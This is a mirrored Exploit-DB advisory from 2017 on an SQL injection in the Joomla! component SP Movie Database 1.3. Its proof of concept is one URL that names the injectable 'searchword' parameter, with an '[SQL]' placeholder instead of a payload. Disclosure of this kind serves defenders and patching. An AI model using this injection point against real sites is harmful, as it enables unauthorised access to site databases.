Joomla! Component SP Movie Database 1.3 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-08-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42502/
  • # # # # #
    # Exploit Title: Joomla! Component SP Movie Database 1.3 - SQL Injection
    # Dork: N/A
    # Date: 18.08.2017
    # Vendor Homepage: http://joomshaper.com/
    # Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/sp-movie-database/
    # Demo: http://demo.joomshaper.com/2016/moview/
    # Version: 1.3
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    # 	
    # Proof of Concept:
    # 
    # http://localhost/[PATH]/index.php?option=com_spmoviedb&view=searchresults&searchword=[SQL]&type=movies&Itemid=523
    # 
    # Etc..
    # # # # #